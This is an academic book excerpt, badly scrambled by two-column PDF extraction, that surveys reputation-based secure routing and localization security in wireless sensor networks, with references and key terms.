node keeps track of each other’s reputation accord- and CORE. The work, however, in WSN is not
ing to the behavior it observes, and the reputation heavily studied. When considering WSN, reputa-
information may be exchanged between nodes to tionsystemsbecomemorechallengingforthefirst
help each other to infer the accurate values. There two phases, that is, monitoring and rating. Good
isatrade-offbetweenefficiencyinusingavailable monitoring requires a sensor node to be always
information and robustness against misinforma- awake overhearing others’ packets which is an
tion. If ratings made by others are considered, the energy consuming operation. A possible approach
reputation system can be vulnerable to false accu- is to make the responsibility of monitoring for a
sations or false praise. However, if only one’s own specificsetofsensornodes.However,thisyields
experience is considered, the potential for learning a poor rating mechanism. Moreover, the rating
0
model should be able to mathematically track the • The routing decision is not to select the next
node behavior. Complex models may require a hop but to decide to participate in the trusted
heavy processing task and memory usages. Theses route.Asaresult,selfishbehavior - isnotad
resources are more in demand for data processing dressed well in SAR.
in the constrained WSN node.
In the following sections, we briefly describe TRANS: Proposed by Tanachaiwiwat, Dave,
some reputation-based solution designed for Bhindwale, and Helmy (2004), TRANS is a geo-
WSN. graphic routing protocol (GPSR-based) that pro-
vides security services using trust metric. It can
Reputation-Based Solutions be considered as a tight trust-based routing due to
its specific targets and assumptions. It basical
SAR: Security-aware routing (SAR) proposed targets a misbehavior model in which an attacker
by Naldurg, Yi, and Kravets (2001) is a protocol selectively participates in routing signaling and
derived from AODV and based on authentication control packets, but drops consistently queries
and a metric called the hierarchal trust values and data packets. The protocol also assumes static
metric. The hierarchal trust values metric governs sensor networks in which a tight mapping can
routing protocol behavior. This metric is embedded be done between the nodes’ identities and their
intocontrolpacketstoreflecttheminimum locations.trust
TRANS assumes a location-centric
value a router should have to be able to forward architecture that helps it in isolating misbehavior
the received packet. This value is determined by and establishing trust routing in sensor networks.
the sender. A node that receives any packet can As a result of that, the protocol assumes a certain
neither process it nor forward it unless it provides communication model in which a single or multiple
the required trust level present in the packet. sinks initiate communication requests with various
Moreover, this metric is also used as a criterion locations. During that phase, insecure locations are
to select routes when many routes satisfying the identified and blacklisted. The trust metric us
required trust value are available. to judge on location security is calculated based
There are some problems and limitations in on nodes’ experience among each other regard-
SAR: ing their identities, link availability, and packet
forwarding.
• The routing operation needs to encounter a There are some problems and limitations in
trusted route setup phase that is done using TRANS:
cryptographic authentication. This setup
contributes some initial delay and requires • In TRANS, the trust, in fact, is associated
some sophisticated crypto mechanisms. with locations rather than the nodes. The
• The trust metric used in SAR does not re- problem is that a location can be infected by a
ect
fl exactly nodes’ behavior; rather, single theynode. The detour, then, will be around
represent a “rank” that a node exhibits based a larger area rather than a single node.
on its identity and various security service • Nodes located in proximity of an infected
provision. Thus, a trusted node in SAR is a location might be also isolated. If not, they
node that has the appropriate rank that meets are also exposed to heavy routing duties that
the routing requirements. To rank a node is mayinduceselfishbehavior.
another problem by itself that is not addressed • TRANS is limited by single or multiple sink
very well. communication models. This assumption is
• The routing decision rules in SAR are gov- necessary for the efficient operation of the
erned by the source, which makes the protocol protocol.
lessexible.
fl • TRANS discusses approaches to decrease
energy consumption due to the security
0
provision overhead. However, the protocol is assumed to be in a promiscuous mode to overhear

doesnotprovideenergyefficienttechniques neighbors’ packets. Monitoring behavioral events
in the routing operation itself. canresultineithercooperativeevent,K,inwhicha
node is behaving well or noncooperative behavior,
RGR: Resilient geographic routing (RGR) in
,2 whichanodemisbehaves.Thecountofeach
protocol proposed by AbuGhazaleh, Kang, and Liu type is injected into the beta distribution formula
(2005) is also a trust-based routing protocol that as the distribution parameters to calculate the
reliesonamodifiedroutingoperationin GPSR.
node The
reputation R. This formula calculates node’s
basic idea in RGR is to assign an initial trust value reputation based on first hand information. The
for each node. Then, this value is incremented or reputation is updated as new monitoring events
decremented depending on the forwarding activity are obtained; second hand information is obtained
of the monitored node using a step function. The and according to the age of the current reputation
source node selects probabilistically a subset among value. Any response action is based on selecting
its neighbors to forward its packet. This subset is the most trusted node. The trust value of a node
selected from the node’s forwarding set that exhibit that is used for decision making is calculated as the
trust values greater than a threshold. statistical expectation of the reputation value.
There are some issues that are not considered This work, however; lacks some important
in RGR. points:
• The protocol has no provision for energy • The monitoring mechanism uses a normal
efficiency. watchdog mechanism that assumes a promis-
• The protocol totally relies on trust-based cuous mode operation for every node. This is
forwarding. If a node is completely sur- not suitable for the WSN conditions in terms
rounded by misbehaving nodes, there is no of energy scarcity as discussed earlier.
other mechanism proposed to select a next • The system does not show a practical solu-
hop since all nodes will be eliminated from tion implementation of monitoring and rating
the node’s forwarding list. phases. From an implementation point of
• RGR is a multipath trust-based routing. view, the study should provide an example
Although multipath is important for reliable of how monitoring and rating will be done
services, it is also believed that multipath under some application assumptions.
routing is energy consuming, which is a very • The work does not propose a response meth-
important issue to consider in WSN odology, for example, a routing algorithm.
Instead, it leaves it an open issue. Therefore,
Reputation-based framework for high integ- theworklacksperformancefiguresthatcan
rity sensor networks: Ganeriwal and Srivastava show the efficiency and security gain and
(2004) propose a reputation-based framework for benefits in routing operation that can be
sensor networks where nodes maintain a reputa- obtained in adopting this solution.
tion for other nodes and use it to evaluate their
trustworthiness. The authors tried to focus on an Reputation system-based solution for trust-
abstract view that provides a scalable, diverse, and aware routing: This work proposed by Maarouf
a generalized approach hoping to tackle all types and Naseer (2007) provides a reputation system-
of misbehaviors. They also designed a system based solution for trust aware routing as a main
within this framework and employed a Bayesian security concern in WSN. In contrast to similar
formulation, using a beta distribution model for existing solutions for ad hoc networks like CORE
reputation representation. (Michiardi & Molva, 2002) and CONFIDANT
In this system, monitoring mechanism follows (Buchegger & Boudec, 2003) or those for WSN like
the classic watchdog methodology in which a node RFSN (Josang & Ismail, 2002), this work proposes
0
solutions to focusing on satisfying WSN resources new contribution in CRATER is its mathematical
constraints and conditions, while maintaining the approach that is used to rate nodes based on what
security requirements. Thus, the solution proposes is called cautious assumptions, which are very
new mechanisms and approaches that are custom- true in most WSN. These assumptions basically
ized for WSN constraints. introduce the cases in which WSN nodes are very
The work adopts a modular design approach sensitive to hearing SHI and are concerned with
by which it treats every individual component as their immediate neighbors.
a separate problem and studies it in the lights of Moreover, the rating component is evaluated
WSN conditions adaptation and customization. The by a novel and promising mechanism proposed to
integrated reputation system is termed as senor evaluate different reputation systems. The evalu-
node attached reputation evaluator (SNARE) ation scheme is called reputation systems-inde-
(Maarouf & Naseer, 2006) which consists of pendent scale for trust on routing (RESISTOR).
three main components: monitoring component, RESISTOR is based on the analogy of the resistance
rating component, and response component. phenomenoninelectriccircuits.Itdefinesametri
For the monitoring part, the work proposes a called “resistance” to represent how much a node
newmonitoringstrategycalledefficient - monitor itsmaliciousneighborsbyfindingthe
isresisting
ing procedure in reputation system (EMPIRE) to ratio between the risk value for the malicious node,
solvetheproblemofefficientmonitoring whichinWSN.
is computed by the monitoring node using
EfficientmonitoringshouldguaranteeCRATER, asatisfying
andthenumberofpacketsowed fl into
level of capturing neighborhood activities, while that malicious node. Then, based on that figure,
trying to minimize power consumption, memory which is called the resistance figure, the system
usage, processing activities, communication performance is analyzed for evaluation.
overhead, and so forth. In this work, monitoring Finally, the response component of the reputa-
efficiency is realized by the association tionbetween
system suggests a new routing protocol that
the nodal monitoring activity (NMA) and various aims to provide a secure packet delivery service
performance measures. NMA is determined by guarantee by incorporating the behavior trust
the frequency of monitoring actions that a node concept into the routing decision. The proposed
takes to collect direct observation information. geographic, energy and trust aware routing (GE-
Reducing the frequency of monitoring, that is, TAR) protocol is an enhanced version of the GEAR
reducing NMA, will affect the quantity and/or protocol (Yu, Govindan, and Estrin 2001). GEAR
the quality of the obtained information. Thus, the is basically a geographic routing protocol in which
performance measures will be affected. However, the next hop is selected based on two metrics: the
on the other hand, this reduction implies a saving distance between the next hop and the destination
in node’s resources such as power, processing, and the remaining energy level the next hop owns.
and memory, which are the constraints that are The new contribution of this work is to add a third
faced in WSN. EMPIRE provides a probabilistic metric in the next-hop selection process, that is, the
approach to reduce nodal monitoring activities, risklevelofanodedefinedastheamountofrisk
while keeping the performance of the system, from the sender may encounter by selecting a particular
the behavior and trust awareness perspective, at a node as a next hop. The risk value a sender knows
desirable level. aboutanodereflectsthe“trustworthiness”tha
The rating component proposed in this work has towards that node.
is called cautious rating for trust enabled routing
CRATER)
( . Basically, this technique identifies
three rating factors: firsthandinformation(FHI) ,
futurE rEsEArcH dIrEctIons
second hand information SHI) ( , and a defined
period called neutral behavior period (NBP) dur- Recent research work focuses on energy-aware
ing which a node is not doing any activity. The design and efficient communication and net-
0
working within the WSN. On the physical layer order to look for anomalies, applications and typical
level, techniques for low-power hardware design, threat models must be understood. It is particularly
overcoming signal propagation, and optimized important for researchers and practitioners to un-
modulation schemes are of great interest. Another derstand how cooperating adversaries might attack
very important area of open research is the design the system. The promising approach for decentral-
ofenergy-awareandefficientmediumaccess - izedcon
intrusion detection is the use of secure groups.
trol protocol for enhanced WSN performance and More research is needed to determine better node
prolonged network lifetime. On the network level, featuresaddressingspecificvulnerabilitiesa
new integrated identity and behavior trust aware develop improved detection algorithms taking into
routing algorithms that are tailored for operation account sensor node capabilities.
given the limitations of the WSN are necessary. Novel techniques of network clustering that
Finally, at the application layer, protocols neces- maximize the network lifetime are also a hot area
sary for sensor management, task assignment and of research in WSNs (Bandyopadhya & Coyle,
data advertisement, and sensor query and data 2003). Since sensor nodes are prone to failure,
decimation are being developed. fault tolerance techniques come into the picture
Node mobility is an important issue to be con- to keep the network operating and performing its
sidered when developing secure routing protocols. tasks. Routing techniques that explicitly employ
Most of the current protocols assume that the faulttolerancetechniquesinanefficientmanner
senor nodes and the base stations are stationary. still under investigation (Dulman et al., 2003).
However, there might be situations such as battle Another area which needs extensive research
environments where the base station and possibly is the study of survivability issues in wireless
the sensors need to be mobile. In such cases, fre- sensor networks. Survivability of a system can be
quent update of the position of the base station and definedasthecapabilitytofulfillitsmission,ina
sensor nodes and propagation of that information timely manner, and in the presence of intrusions,
through the network and rekeying operation may attacks, accidents, and failures. A framework
excessively drain the energy of nodes. New secure of survivability model for WSN with software
routing algorithms are needed in order to handle rejuvenation methodology, which is applicable in
the overhead of mobility, rekeying, and topology security, has been proposed by (Kim, Shazzad,
changes in such an energy-constrained environ- and Park (2006).
ment. A feature that is important in every routing Most of the currently proposed key management
protocol is to adapt to topology changes very schemes are based on the assumption that all the
quickly and to maintain the network functions. nodes in the sensor networks are homogeneous
One aspect of sensor networks that complicates and with similar capabilities, such as memory and
the design of a secure routing protocol is in network radio range. It has been found that by applying
aggregation. In WSNs, in-network processing heterogeneous sensor nodes in a sensor network,
makes end-to-end security mechanisms harder the small percentage of more capable sensor
to deploy because intermediate nodes need direct nodes can provide an equal level of security, and
access to the contents of the messages. Finding meanwhile improve the resilience of node com-
efficientlyandoptimallytheprocessing points
promise. The inunbalanced scheme proposed by
WSNs is still an open research issue. Traynor, Choi, Cao, Zhu, and La Porta (2004) not
There are not many published work on the only reduces the number of transmissions neces-
general intrusion detection techniques for wireless sary to establish session-keys but also reduces the
sensor networks. There are some works on intru- effect of both single and multiple node captures.
siondetectiontargetedforspecifickind Anotherofattacks.
area which needs intensive research is the
Wireless sensor networks require a solution that is development of path-key establishment phase of
fully distributed and inexpensive in terms of com- key management scheme. Some special protocols
munication, energy, and memory requirements. In combined with routing information may be con-

sideredtoachievethesecureandefficient path-key
conclusIon
establishment. Furthermore, based on the current
research on the coverage and connectivity in the In this chapter, we have presented a comprehen-
sensor networks, some random distribution model sive treatment of the routing security problem in
(Bettstetter, 2002) should also be considered when wireless sensor networks. We have provided an
modeling a secure communication model in wire- overview of WSN architecture, possible applica-
less sensor networks. tions, and indicated the special characteristics of
An important area which needs extensive wireless sensor networks from routing perspective.
research is the development of efficient We havenodehighlighted the importance of secure
monitoring and rating approaches in reputation routing problem considering the different network
system-based solutions. Another problem which aspects and special conditions of WSN. We have
needs extensive research is a bootstrapping problem provided a detailed analysis of routing threats and
in sensor networks. This the startup period which attacksthataremorespecifictoroutingoperat
is required to build reputation and trust among in wireless sensor networks and also indicated pos-
nodes in a network in noncryptographic-based sible countermeasure against these attacks. We have
solutions and to discover shared keys and perform provided a comprehensive review and an in-depth
key-setup among sensor nodes in cryptographic- discussion of different intrusion prevention and de-
based solution. Minimizing this startup period to tection techniques, cryptographic-based solutions
prevent node compromise during bootstrapping (with emphasis on key management schemes), and
is an open issue. noncryptographic-based solutions (with emphasis
Public-key solutions built upon the pair- on trust and reputation of sensor nodes) for the
ing-based identity-based cryptography (IBC) is secure routing problem highlighting their pros and
emerging as an alternative (more appropriate than cons. We have also presented some open problems
traditional public key cryptography for WSNs) with that are currently being researched.
theefficienthardwareimplementation - ofTatepair
ing (Barreto, Lynn, & Scott, 2004) on smartcard
(Bertoni, Chen, Fragneto, Harrison, & Pelosi, rEfErEncEs
2005), PDAs (Scott, 2005), and FPGAs (Kerins,
Marnane, Popovici, & Barreto, 2005). AbuGhazaleh, N., Kang, K.D., & Liu, K. (2005,
Another issue which has triggered a growing October 10-13). Towards resilient geographic rout-
debate is on the use of symmetric-key vs. public- ing in WSNs. Paper presented at MSWiM’05.
key cryptography (PKC) in WSNs. How to modify
the public key cryptography and apply it to the key Agah, A., & Das, S.K. (2007, September). Pre-
management issues in resource-constrained WSNs venting DoS attacks in wireless sensor networks:
is a major challenge. Recent studies show that it A repeated game theory approach. International
is still possible to apply public key cryptography JournalofNetworkSecurity, 5
(2), 145-153.
to sensor networks by judiciously selecting right Agah, A., Das, S.K., & Basu, K. (2004). Intrusion
algorithms and associated parameters (Arazi, detection in sensor networks: A non-cooperative
Elhanany, Arazi, & Qi,; 05Gaubatz,
2 Kaps, & game approach. In Proceedings of the Third IEEE
Sunar, 2004). ECC (Malan, Welsh, & Smith, 2004) International Symposium on Network Computing
is especially attractive for constrained wireless and Applications (NCA’04).
devices because the smaller keys in ECC result in
memory, bandwidth, and computational savings. Al-Karaki, J. N., et al. (2004, April 18-21). Data
With the advancements of hardware and software, aggregation in wireless sensor networks: Exact
public key infrastructure in WSN is not only and approximate algorithms. In Proceedings of
possible but also necessary (Gura, Patel, Wander, IEEE Workshop on High Performance Switching
Eberle, & Shantz, 2004). and Routing, Phoenix.

Arazi,B.Elhanany,
, I.Arazi,
, O.Qi,
& , H..)052 ( scheme in distributed sensor networks using at-
Revisiting public-key cryptography for wireless tack probabilities. Paper presented at the Global
sensor networks. Computer, 38(11), 103-105. Telecommunications Conference, GLOBECOM
‘05 (Vol. 2, pp. 5-). IEEE.
Bandoyopadhya, S., et al., (2006).Clustering
distributed data streams in peer-topeer environ- Da Silva, A.P.R., Martins, M.H.T., Rocha, B.P.S.,
ments. InformationSciences, (14),6 7 1 1952-1955.
Loureiro, A.A.F., Ruiz, L.B., & Wong, H.C. (2005,
Elsevier. October 13). Decentralized intrusion detection
in wireless sensor networks. Paper presented at
Bandyopadhya, S., & Coyle, E. (2003). An energy
Q2SWinet’0,Montreal,
5 Quebec,Canada.
efficienthierarchicalclustering-algorithmforwire
less sensor networks. In Proceedings of INFOCOM Deng, J., Han, R., & Mishra, S. (2002, November).
2003 (Vol. 3, 1713-1723). INSENS: Intrusion-tolerant routing in wireless
sensor networks (Tech. Rep. CU-CS-939-02).
Bannerjee, S., Grosan, C., & Abraham, A. (2005).
University of Colorado, Department of Computer
IDEAS intrusion detection based on emotional ants.
Science.
Paper presented at the 5th International Conference
on Intelligent Systems Design and Applications Deng, J., Han, R., & Mishra, S. (2004). Intrusion
(ISDA ‘05) (pp. 344-349). tolerance and anti-traffic analysis strategies
wireless sensor networks. Paper presented at the
Barreto, P., Lynn, B., & Scott, M. (2004). On the
IEEE International Conference on Dependable
selection of pairing-friendly groups. In Proceeding
Systems & Networks (DSN) (pp. 594-603).
of Selected Areas Cryptography (LNCS 3006, pp.
17-25). New York: Springer Verlag. Di Pietro, R., Mancini, L.V., & Mei, A. (2003).
Random key-assignment for secure wireless sensor
Bertoni, G., Chen, L., Fragneto, P., Harrison, K.,
networks. In Proceedings of the 1st ACM Workshop
& Pelosi, G. (2005). Computing Tate pairing on
on Security of Ad Hoc and Sensor Networks, Fair-
smartcards (White paper STMicroelectronics).
fax, VA, (pp. 62-71).
Retrieved October 27, 2007, from http://www.
st.com/stonline/products/families/smartcard/ Di Pietro, R., Mancini, L.V., & Mei, A. (2006,
ast_ibe.htm December). Energy efficient node-to-node - au
thentication and communication confidential
Bettstetter, C. (2002). On the minimum node
in wireless sensor networks. Springer Journal on
degree and connectivity of a wireless multi-hop
Wireless Networking, 12(6), 709-721.
network. In Proceedings of the 3rd ACM Interna-
tional Symposium on Mobile Adhoc Networking Dolev, D., & Yao, A.C. (1983). On the security
and Computing’02, EPF Lausanne, Switzerland, of public-key protocols. IEEE Transactions on
(pp.80-91). ACM Press. InformationTheory, (2),92 198-208.
Buchegger, S., & Boudec, J.Y.L. (2003, July). A Du, W., Deng, J., Han Y.S., Chen, S., & Varshney,
robust reputation system for mobile ad-hoc net- P.K. (2004, March). A key management scheme for
works (Tech. Rep. IC/2003/50). EPFL IC. wireless sensor networks using deployment knowl-
edge. Paper presented at the IEEE INFOCOM.
Chan, H., Perrig, A., & Song, D. (2003, May
11-14). Random key predistribution schemes for Du, W., Fang, L., & Ning, P. (2005). LAD: Lo-
sensor networks. In Proceedings of the IEEE calization anomaly detection for wireless sensor
Symposium on Security and Privacy, Oakland, networks. Paper presented at the IPDPS.
CA, (pp.197-213).
Dulman, S., et al. (2003, March). Trade-off between
Chan, S., Poovendran, R., & Sun, M. (2005, trafficoverheadandreliabilityinmultipathrou
November 28-December 2). A key management

for wireless sensor networks. Paper presented at Jolly, G., Kuscu, M., Kokate, P., & Younis, M. (2003,
the WCNC Workshop, New Orleans. June). A low-energy key management protocol for
wireless sensor networks. In Proceedings of the
Eltoweissy, M., Heydaru, H., Morales, L., &
IEEE Symposium on Computers and Communica-
Sadborough, H. (2004, March). Combinatorial
tions, ISCC’2003 (p. 335).
optimization of key management in group com-
munications. Journal of Network and Systems Josang, A., & Ismail, R. (2002, June). The beta
Management: Special Issue on Network Security, reputation system. Paper presented at the 15th Bled
332. Electronic Commerce Conference, e-Reality: Con-
structing the e-Economy, Bled, Slovenia.
Eltoweissy, M., Moharrum, M., & Mukkamala, R.
(2006, April). Dynamic key managements in sen- Kaplantzis, S. (2004, October). Classification
sor networks. IEEE Communications Magazine, techniques for network intrusion detection (Tech.
122-130. Rep.). Monash University, ECSE.
Eschenauer, L., & Gligor, V.D. (2002). A key-man- Karlof, C., & Wagner, D. (2003). Secure routing
agement scheme for distributed sensor networks. in wireless sensor networks: Attacks and counter-
In Proceedings of the th
ACM9 Conference on measures. Ad Hoc Networks, 1(2-3), 293-315.
Computer and Communications Security (pp.
Kerins, T., Marnane, W., Popovici, E., & Barreto,
41-47). Washington D.C.: ACM Press.
P.,052August-
( September). Efficient hardware
Eskin, E., Arnold, A., Pereau, M., Portnoy, L., for the for Tate pairing calculation in charac-
& Stolfo, S. (2002). A geometric framework for teristic three. In Proceedings of Workshop on
unsupervised anomaly detection: Detecting intru- Cryptographic Hardware and Embedded Systems,
sion in unlabeled data. Data Mining for Security Edinburgh, Scotland, (pp. 412-426).
Applications. Kluwer.
Kim, D.S., Shazzad, K.M., & Park, J. S. (2006).
Ganeriwal, S., & Srivastava, M. (2004). Reputa- A framework for survivability model for wireless
tion-based framework for high integrity sensor sensor network. In Proceedings of First Interna-
networks. In Proceedings of the 2nd ACM Work- tional Conference on Availability, Reliability and
shop on Security of Ad Hoc and Sensor Networks, SecurityARES’0
( )6 .
Washington, D.C.
Loo, C.E., Ng, M.Y., Leckie, C., & Palaniswami,
Gaubatz, G., Kaps, J., & Sunar, B. (2004). Public M. (2006). Intrusion detection for sensor networks.
key cryptography in sensor networks: Revised. In International Journal of Distributed Sebsor Net-
Proceedings of 1st European Workshop on Security works.
in Ad-hoc and Sensor Networks (ESAS 2004),
Maarouf, I.K., & Naseer, A.R. (2007, May).
Heidelberg, Germany, (pp. 2-18). Springer.
WSNodeRater: An optimized reputation system
Gura, N., Patel, A., Wander, A., Eberle, H., & framework for security aware energy efficient
Shantz, S. C. (2004, April). Comparing elliptic geographic routing in WSNs. Paper presented at the
curve cryptography and RSA on 8-bit CPUs. In ACS/IEEE International Conference on Computer
Proceedings of CHES, Boston, (pp. 119-132). Systems and Applications, Amman, Jordan.
Han, J., & Kamber, M. (2001). Data mining: Malan, D. J., Welsh, M., & Smith, M.D. (2004,
Concepts and techniques. Morgan Kauffmann October). A public-key infrastructure for key
Publishers. distribution in tinyOS based on elliptic curve
cryptography. In Proceedings of IEEE SECON,
Hu, Y.C., Perrig, A., & Johnson, D. B. (2003,
Santa Clara, CA, (pp.71-80).
April). Packet leashes: A defense against wormhole
attacks in wireless networks. In Proceedings of Marouf, I.K., & Naseer, A.R. (2006, December).
IEEE INFOCOMM 2003. SNARE: Sensor node attached reputation evalua-

tor. Paper presented at the CONEXT ’06, LIsboa, Pottie, G., & Kaiser, W. (2000). Wireless integrated
Portugal. network sensors. Communications of the ACM,
43(5), 551-558.
Michiardi, P., & Molva, R. (2002, September).
Core: A collaborative reputation mechanism Rajasegarar, S., Leckie, C., Palaniswami, M., &
to enforce node cooperation in mobile ad hoc Bezdek, J.C. (2006, October 30-November 1).
networks. Paper presented Communication and Distributed anomaly detection in wireless sensor
Multimedia Security Conference, Portoroz, Slo- networks. In Proceedings of Tenth IEEE Interna-
venia, (pp. 26-27). tional Conference on Communications Systems
(IEEEICCS)026 , Singapore.
Mui, L., Halberstadt, A., & Mohtashemi, M. (2002,
July). Notions of reputation in multi-agents systems: Savvides, A., Han, C., & Srivastava, M. (2001,
A review. In Proceedings of First International July)Dynamic
. fine-grainedlocalizationinad-hoc
Joint Conference Autonomous Agents and Multi- networks of sensors. In Proceeding of 7th ACM
Agent Systems (pp. 280-287). MobiCom (pp. 166-179).
Mun, Y., & Shin, C. (2005, May 9-12). Secure Scott, M. (2005, February). Computing the Tate
routing in sensor networks: Security problem pairing. In Proceedings of Cryptographers’ Track
analysis and countermeasures. Paper presented at the RSA Conference, San Francisco, (pp. 293-
at the International Conference on Computational 304).
Science and Its Applications – ICCSA 2005, Sin-
Tanachaiwiwat, S., Dave, P., Bhindwale, R., &
gapore, (LNCS 3480, pp. 459-467). Heidelberg,
Helmy, A. (2004, April). Location-centric isola-
Germany: Springer Verlag.
tion of misbehavior and trust routing in energy-
Naldurg, S., Yi, R., & Kravets, R. (2001). Secu- constrained sensor networks.
rity-aware ad-hoc routing for wireless networks.
Traynor, P., Choi, H., Cao, G., Zhu, S., & La
Paper presented at the ACM Workshop on Mobile
Porta, T. F. (2004). Establishing pair-wise keys in
Ad Hoc Networks, MOBIHOC.
heterogeneous sensor networks (Networking and
Onat, I., & Miri, A. (2005, August). An intrusion Security Center, Tech. Rep. NAS-TR-0001-2004).
detection system for wireless sensor networks. Penn State University, Dept of Computer Science
Wireless and Mobile computing Networking and & Engineering.
Communications, 3, 253-259.
Wood, A., & Stankovic, J. (2002, October). Denial
Oniz, C.C., Tasci, S.E., Savas, E., Ercetin, O., of service in sensor networks. IEEE Computers,
& Levi, A. (2005). SeFER: Secure, flexible and 54-62.
efficient routing protocol for distributed sensor
Yang, C., Zhou, J., Zhang, W., & Wong, J. (2006,
networks. Paper presented at the IEEE 2005 (pp.
May 29- June 1). Pairwise key establishment for
246-255).
largescalesensornetworks:Fromidentifierbased
Perrig, A., Szewezyk, R., Wen, V., Culler, D., & to location based. In Proceedings of the first - In
Tygar, J. (2001). SPINS: Security protocols for sen- ternational Conference on Scalable Information
sor networks. In Proceedings of Mobile Networking Systems,INFOSCALE’06 , HongKong.
and Computing 2001.
Younis, M., Ghumman, K., & Eltoweissy, M.
Pirretti, M., Zhu, S., Narayanan, V., McDaniel, (2006). Location-aware combinatorial key manage-
P., Kandemir, M., & Brooks, R. (2005, October). ment for clustered sensor networks. IEEE Transac-
The sleep deprivation attack in sensor networks: tions on Parallel and Distributed Systems.
Analysis and methods of defense. Paper presented
Yu, Y., Govindan, R., & Estrin, D. (2001, May).
at the Conference on Innovations and Commercial
Geographical and energy-aware routing: A re-
Applications of Distributed Sensor Networks.

cursive data dissemination protocol for wireless key setup, node addition/rekeying, and node evic-
sensor networks (Tech. Rep. UCLA/CSD-TR-01- tion/key revocation.
0023). University of Southern California.
Reputation System: A type of collaborative
Zhang, Y., Liu, W., Lou, W., & Fang, Y. (2006, filteringalgorithm which attempts to determine
February). Location based compromise-tolerant ratings for a collection of entities, given a col-
security mechanisms for wireless sensor networks. lection of opinions that those entities hold about
IEEE Journal on Selected Areas in Communica- each other.
tions, 24(2).
Routing Attacks: Network layer attacks such
Zhu, S., Setia, S., & Jajodia, S. (2003). LEAP: asroutinginformationspoofing,alteration - orre
Efficient security mechanisms for large- play,scale
blackhole and selective forwarding attacks,
distributed sensor networks. In Proceedings of sinkhole attacks, Sybil attacks, wormhole attacks,
ACM CCS, 2003. HELLO ood
fl attacks, and acknowledgement
spoofing.
kEy tErMs Routing Security: Securing routing operation
from attacks in a network by deploying appropri-
DoS Attack: Any event that decreases or elimi- ate defense.
nates a network’s capacity to perform its expected
Trust: A relationship of reliance. Trust is a
function is termed as a denial-of-service attack or
prediction of reliance on an action, based on what
commonly known as DoS attack.
a node knows about the other node, in the context
Intrusion: Can be defined as a set of actions of wireless sensor networks. The notion of trust
that can lead to an unauthorized access or altera- is increasingly adopted to predict acceptance of
tion of a certain system. behaviors by others.
Key Management: A scheme to dynamically Wireless Sensor Network (WSN): A wire-
establish and maintain secure channels among less network consisting of spatially distributed
communicating nodes. In wireless sensor networks, autonomous devices using sensors to cooperatively
a key management scheme must deal with the monitor physical or environmental conditions, such
following important issues: key deployment/key as temperature, sound, vibration, pressure, motion,
predistribution, key discovery, key establishment/ or pollutants at different locations.

Chapter XXXVII
Localization Security in Wireless
Sensor Networks
Yawen Wei
Iowa State University, USA
Zhen Yu
Yong Guan
AbstrAct
Localization of sensor nodes is very important for many applications proposed for wireless sensor
networks (WSN), such as environment monitoring, geographical routing, and target tracking. Because
sensor networks may be deployed in hostile environments, localization approaches can be compromised
by many malicious attacks. The adversaries can broadcast corrupted location informa
jam or modify the transmitting signals between sensors to mislead them to obtain incorrect distance
measurements or nonexistent connectivity links. All these malicious attacks will cause sensors not able
to or wrongly estimate their locations. In this chapter, we summarize the threat models and provide a
comprehensivesurveyandtaxonomyofexistingsecurelocalizationandverification - sch
less sensor networks.
IntroductIon taryapplicationse. ( g.battlefield

, surveillance)an
civilian applications (e.g., environment and habitat
In recent years, the availability of low-cost, low- monitoring, target tracking, seismic detection,
power, multifunctional, small-size autonomous smart-home automation, and traffic control). To
devices equipped with various sensors has expe- facilitate the cooperation between sensors and
dited the development of wireless sensor networks achieve different application goals, network and
(WSN). Wireless sensor networks have both mili- application protocols such as routing protocol, data
Localization Security in Wireless Sensor Networks
aggregation algorithm, and localization algorithm vulnerable to many localization-specific attack

need to be properly designed. e.
( g.distance-
, modificationattack)thatcannotbe
Among these research issues, localization of prevented by traditional security mechanisms. All
sensor nodes is very important to some applica- these attacks can cause the sensors to be not able
tions. For example, in environment surveillance to or wrongly estimate their locations.
applications, a sensor must report its location to In this chapter, we provide a comprehensive
the monitoring center when it detects some enemy survey and taxonomy of existing countermeasures
force (e.g., a tank); in geographical routing protocol, that secure the localization in wireless sensor
a sensor should know the locations of its neighbors networks. We classify the secure countermeasures
and forwards data packets to the neighbor who is into secure localization schemes, which enhance
closest to the destination. sensors’ attack-resistant ability, and location
Traditional localization approaches require verificationschemes,whichverifysensors’ - loca
the sensor nodes to equip with expensive global tions (accept the correct location estimations and
positioning system (GPS) devices, which are not discard the abnormal ones) after the sensors have
affordable in some cases, especially in large- obtained their locations. We also classify these
scale sensor networks. Hence, many localization secure localization or ( verification) schemes on
schemes (Bahl & Padmanabhan, 2000; Bulusu, whether they use precise (with nanosecond preci-
Heidemann, & Estrin, 2000; Doherty, Pister, & sion) time-measuring hardware, sectored antenna,
Ghaoui, 2001; Fang, Du, & Ning, 2005; Harter, or not use any special hardware.
Hopper, Steggles, Ward, & Webster, 1999; He, The rest of chapter is organized as following: In
Huang, Blum, Stankovic, & Abdelzaher, 2003; the following section, we take an overview and give
Lazos & Poovendran, 2004; Nicolescu & Nath, aclassificationofcurrentlocalizationapproach
2001, 2003; Priyantha, Chakraborty, & Balakrish- We describe the threat models, and we provide
nan, 2000; Savvides, Han, & Srivastava, 2001; the taxonomy of existing secure localization ap-
Shang, Ruml, Zhang, & Fromherz, 2003; Smith, proaches. Finally, we discuss some future trends
Balakrishnan, Goraczko, & Priyantha, 2004) have and conclude the chapter.
been proposed. These schemes assume that some
special sensor nodes (named anchors) can obtain
their absolute locations through GPS device. Thus bAckground: locAlIzAtIon In
other sensors can use the measured distance or wIrElEss sEnsor nEtworks
connectivity information between them and the
beacon messages sent from the anchors to calculate In recent years, many localization approaches
their locations. have been proposed for wireless sensor networks.
When sensor networks are deployed in hostile Before we talk about the security issues, let us
environments, localization approaches are vul- take an overview of the localization systems and
nerable to many malicious attacks. For example, the techniques involved in different localization
the adversaries can compromise a sensor node approaches.
and send out false location information to disturb The most traditional and widely-used local-
the localization of other nodes. Sensor nodes are ization system is the global positioning system.
constrained by limited energy resources, memory The earth-based GPS receivers can provide users
resource, computation ability, and communication with location, speed, and time by calculating the
bandwidth, therefore, traditional cryptography distances from at least three satellites. However,
mechanisms such as a public key system cannot it is not feasible to equip the relatively expensive
be applied to wireless sensor networks. Moreover, GPS receiver on each node in large scale sensor
localization approaches utilize the physical features networks. Most localization algorithms assume
of the transmitting signals between sensors (e.g., thatonlyafractionofsensornodesinthefieldcan
transmitting time or signal strength), thus they are obtain their locations through GPS receivers (or

throughmanualconfigurations)These . nodes are

approaches. Besides the least mean square criteria,
called anchors and serve as location references for Kalman-filter(KF)andleast mean square (LMS)
